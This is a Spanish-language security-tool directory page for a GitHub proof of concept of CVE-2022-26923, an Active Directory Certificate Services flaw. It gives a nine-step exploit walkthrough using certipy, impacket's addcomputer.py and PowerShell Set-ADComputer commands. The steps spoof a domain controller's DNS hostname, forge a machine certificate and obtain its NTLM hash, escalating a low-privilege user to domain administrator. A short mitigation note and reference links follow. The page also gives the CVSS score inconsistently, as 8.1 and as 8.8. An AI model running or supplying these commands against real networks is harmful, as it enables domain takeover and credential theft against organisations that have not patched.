Skip to content
KitploitKITPLOIT
HerramientasExploitsBlog
Log in
Enviar
HerramientasExploitsBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

FeedsContactoPrivacidad© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2022-26923_AD-Certificate-Services — La vulnerabilidad permitía a un usuario con pocos privilegios escalar privilegios a administrador de dominio en un entorno predeterminado de Active Directory con el rol de servidor de Servicios de Certificados de Active Directory (AD CS) instalado. | Kitploit
Herramientas/GitHubGitHub/ludovicpatho/cve-2022-26923_ad-certificate-services
Escalada de PrivilegiosAnálisis de VulnerabilidadesExplotaciónPruebas de PenetraciónAutenticación
GitHubludovicpatho/cve-2022-26923_ad-certificate-services

CVE-2022-26923_AD-Certificate-Services

La vulnerabilidad permitía a un usuario con pocos privilegios escalar privilegios a administrador de dominio en un entorno predeterminado de Active Directory con el rol de servidor de Servicios de Certificados de Active Directory (AD CS) instalado.

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
Ver Repositorio
411410hace 4 añosRevisado por Kitploit

CVE-2022-26923 AD Certificate Services

  • Fecha de publicación : 10/05/2022
  • Complejidad del ataque: Baja
  • Privilegios requeridos: Bajo
  • Puntuación CVSS : 8.1

La vulnerabilidad permitía a un usuario con pocos privilegios escalar privilegios a administrador de dominio en un entorno predeterminado de Active Directory con el rol de servidor de Servicios de Certificados de Active Directory (AD CS) instalado.

Un exploit fue desarrollado por Oliver Lyak (ly4k_) en Python y fue publicado antes y no después del aviso. Se declara como prueba de concepto. El exploit está disponible para descarga en research.ifcr.dk.

Fuente :

  • https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-26923
  • https://research.ifcr.dk/certifried-active-directory-domain-privilege-escalation-cve-2022-26923-9e098fe298f4
  • https://vuldb.com/fr/?id.199368

Descripción

La falla de escalada de privilegios de dominio de Active Directory recién revelada aún no ha sido explotada en la naturaleza, pero su alta puntuación CVSS de 8.8 apunta a un alto riesgo que representa para los sistemas comprometidos, permitiendo a los atacantes abusar de los problemas de certificados. CVE-2022–26923 permite manipular el atributo DnsHostName, que especifica el nombre del equipo tal como está registrado en DNS, y luego permite a un adversario obtener un certificado de los Servicios de Certificados de AD, lo que potencialmente conduce a la elevación de privilegios.

POC

    - Usuario: user_test
    - Contraseña: Password123#
    - Dominio: my.domain.com
    
    Para reproducir debes: 
    - Tener impacket y certipy instalados en la máquina atacante.
      - https://github.com/SecureAuthCorp/impacket
      - https://github.com/ly4k/Certipy
    - Haber comprometido un usuario con pocos privilegios. 
    - Un sistema es vulnerable solo si los Servicios de Certificados de Active Directory se están ejecutando en el dominio.
  1. Comencemos generando un certificado para nuestro usuario de AD con pocos privilegios (Usuario=user_test Contraseña=Password123#) usando la plantilla de certificado User:

    certipy req 'my.domain.com/user_test:Password123#@hostname.my.domain.com' -ca MY-DOMAIN-HOSTNAME-CA -template User
    
  2. Verifiquemos que el certificado es válido y que puede usarse para autenticación Kerberos mediante Certipy:

    certipy auth -pfx user_test.pfx
    
  3. Agregando una computadora virtual al dominio con Impacket:

    addcomputer.py 'my.domain.com/user_test:Password123#' -method LDAPS -computer-name 'NEW_PC' -computer-pass 'Password123#'
    
    # my.domain.com/user_test:Password123# - We need to provide valid AD credentials in order to add a new computer.
    # method - The method of authentication. LDAPS will interface with the LDAP service on the domain controller.
    # computer-name - The name of our computer. This can be anything we like, as long as it is not the same as an existing computer object.
    # computer-pass - The password associated with our computer's machine account. We will need to impersonate this computer that we create, so make note of the password you chose here.
    
  4. Generemos un certificado para la nueva computadora que creamos. Para usar la cuenta de máquina de dicha computadora, debes agregar un "$" al final del nombre:

    certipy req 'my.domain.com/NEW_PC$:Password123#@hostname.my.domain.com' -ca MY-DOMAIN-HOSTNAME-CA -template Machine
    
  5. En la máquina comprometida, actualizando los atributos de DNS Hostname y SPN:

    PS C:\Users\user_test> Get-ADComputer NEW_PC -properties dnshostname,serviceprincipalname
    
  6. Eliminar nuestro atributo SPN actual:

    PS C:\Users\user_test> Set-ADComputer NEW_PC -ServicePrincipalName @{}
    
  7. Intentar establecer el atributo de nombre de host DNS al del DC:

    PS C:\Users\user_test> Set-ADComputer NEW_PC -DnsHostName HOSTANME.my.domain.com
    
  8. En la máquina atacante, forjando un Certificado Malicioso:

    certipy req 'my.domain.com/NEW_PC$:Password123#@hostname.my.domain.com' -ca MY-DOMAIN-HOSTNAME-CA -template Machine
    
  9. Verificar que este certificado funciona y devolverá el hash NTLM:

    certipy auth -pfx hostname.pfx
    

Mitigaciones y Correcciones

Para la mitigación y medidas de protección de CVE-2022–26923, Microsoft recomienda encarecidamente actualizar todos los servidores que ejecutan Servicios de Certificados de AD y controladores de dominio de Windows que operan autenticación basada en certificados a la última versión del 10 de mayo.

  • https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-26923
Descargar herramienta